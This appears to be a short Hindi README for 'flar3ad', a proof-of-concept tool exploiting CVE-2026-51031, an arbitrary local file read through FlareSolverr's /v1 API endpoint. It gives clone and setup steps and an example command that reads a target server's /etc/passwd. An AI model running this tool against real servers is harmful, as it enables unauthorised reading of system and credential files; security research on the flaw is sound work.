
मनमानी स्थानीय फ़ाइल पढ़ने के लिए CVE-2026-51031 का POC
flar3ad एक उपकरण है जो CVE-2026-51031 का लाभ उठाकर लक्ष्य सर्वर से फ़ाइलें पढ़ता है। यह FlareSolverr के API के /v1 एंडपॉइंट का उपयोग करता है तथा भेद्यता का शोषण करने के लिए driver.get() फ़ंक्शन का उपयोग करता है। इसका विस्तृत विवरण xinyi के ब्लॉग में दिया गया है।
git clone https://github.com/daemoncibsec/flar3ad.git
cd flar3ad
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x flar3ad
venv से बाहर निकलने के लिए:
deactivate
लक्ष्य सर्वर की /etc/passwd फ़ाइल पढ़ें।
./flar3ad http://localhost:8191/ /etc/passwd